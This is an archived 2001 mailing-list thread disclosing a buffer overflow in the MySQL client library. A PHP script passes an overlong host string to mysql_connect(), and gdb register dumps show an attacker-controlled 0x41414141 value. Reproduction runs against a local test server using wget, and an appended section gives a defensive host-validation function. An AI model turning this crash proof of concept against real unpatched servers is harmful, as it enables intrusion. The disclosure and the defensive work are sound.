On Monday 12 February 2001 18:22, you wrote:

> ----- Original Message -----
> From: "Joao Gouveia" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding these issues on 2001-01-26.
> >
> > There still are some potential security flaws with MySql's latest stable
> > release.
> > Here follow some tests I've made, all with:
> >
> > MySql v3.23.32
> > PHP v4.0.4pl1 (static)
> > apache-1.3.14
> >
> > Let's look at a practical example:
> > A simple php script:
> > <?
> > for ( $i=0 ; $i<= $buffer-1 ; ++$i )
> > $host.="A";
> >
> > $cid = mysql_connect($host,$usr,$pwd);
> > ?>
> > Let's run apache ( latest version compiled with latest version of PHP )
> > in debugging mode to see what happens:
> > <quote>
> > spike:~ # gdb /www/bin/httpd
> > ...
> > (gdb) run -X
> > Starting program: /www/bin/httpd -X
> > </quote>
> > On our browser we issue: test.php?buffer=120
> > gdb shows the following
> > <quote>
> > Program received signal SIGSEGV, Segmentation fault.
> > 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > (gdb) bt
> > #0  0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > #1  0x41414141 in ?? ()
> > (gdb) inf reg
> > eax            0x82010c0        136319168
> > ecx            0x3      3
> > edx            0x82010f4        136319220
> > ebx            0x40046324       1074029348
> > esp            0xbfffdc30       0xbfffdc30
> > ebp            0xbfffdfbc       0xbfffdfbc
> > esi            0x8204ba5        136334245
> > edi            0x41414141       1094795585
> > eip            0x40030cf3       0x40030cf3
> > eflags         0x10203  66051
> > cs             0x23     35
> > ss             0x2b     43
> > ds             0x2b     43
> > es             0x2b     43
> > fs             0x0      0
> > gs             0x0      0
> > (gdb)
> > </quote>

Let's try this problem:

Scenario:

Debian Woody.
mysql Ver 11.11 Distrib Mysql 3.23.31
Apache 1.3.14
php 4.0.4pl1

StuffBox:/usr/sbin# gdb apache
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you a
welcome to change it and/or distribute copies of it under certain conditio
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)...
(gdb) run -X
Starting program: /usr/sbin/apache -X
[..]

On the other machine I write this script:
<?php
// $buffer comes straight from the query string (register_globals, PHP 4 era)
for ( $i=0 ; $i<= $buffer-1 ; ++$i )
    $host.="A";
// the oversized host string is handed unchecked to the client library
$cid = mysql_connect($host,$usr,$pwd);
?>
and uploaded it to my public_html on StuffBox (the box that is running apache +
mysql + php).

and tested some buffer lengths from another site:

200:

PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200

StuffBox :
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160       1075552608
ecx            0x0      0
edx            0x2      2
ebx            0x401b9474       1075549300
esp            0xbfffe27c       0xbfffe27c
ebp            0xbfffe2b4       0xbfffe2b4
esi            0x61697620       1634301472
edi            0x6      6
eip            0x40182e9d       0x40182e9d


500:
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160       1075552608
ecx            0x0      0
edx            0x2      2
ebx            0x401b9474       1075549300
esp            0xbfffe27c       0xbfffe27c
ebp            0xbfffe2b4       0xbfffe2b4
esi            0x41414141       1094795585    <<=
edi            0x6      6
eip            0x40182e9d       0x40182e9d


Cya.
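Both backtraces above show an attacker-controlled host string reaching mysql_real_connect() and inet_aton() unchecked. As an added example (not code from either poster), the following PHP guard rejects a host value before it can reach mysql_connect(); the allow-list entries and the 255/63-byte limits (RFC 1035 hostname bounds) are assumptions, chosen because the crashes above needed 120+ bytes, far beyond any legitimate hostname.

```php
<?php
// Added example: validate a DB host before it reaches the MySQL client library.
// The crashes in the thread were triggered by host strings of 120, 200 and 500
// bytes, so bounding length (and syntax) here removes that input path entirely.

function valid_mysql_host($host) {
    // Preferred control: an explicit allow-list of known database hosts
    // (constructed sample values, not from the original posts).
    static $allowed = array('localhost', '127.0.0.1', 'db.example.internal');
    if (in_array($host, $allowed, true)) {
        return true;
    }
    // Hard length bound first: RFC 1035 caps a hostname at 255 bytes.
    if (!is_string($host) || $host === '' || strlen($host) > 255) {
        return false;
    }
    // Dotted-quad IPv4: each octet must be 0..255.
    if (preg_match('/^\d{1,3}(\.\d{1,3}){3}$/', $host)) {
        foreach (explode('.', $host) as $octet) {
            if ((int)$octet > 255) {
                return false;
            }
        }
        return true;
    }
    // Hostname: labels of 1..63 alphanumerics/hyphens, no leading or trailing '-'.
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return (bool)preg_match('/^' . $label . '(\.' . $label . ')*$/', $host);
}

// Never take the host from the request ($_GET or register_globals); it belongs
// in server-side configuration. Reject anything that fails validation outright.
$host = 'localhost';
if (!valid_mysql_host($host)) {
    die('refusing to connect: invalid database host');
}
// Sanity checks on the guard itself:
var_dump(valid_mysql_host(str_repeat('A', 200)));   // bool(false): the crash input
var_dump(valid_mysql_host('192.168.1.2'));          // bool(true)
var_dump(valid_mysql_host('db-01.example.test'));   // bool(true)
var_dump(valid_mysql_host('-bad.example.test'));    // bool(false)
?>
```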
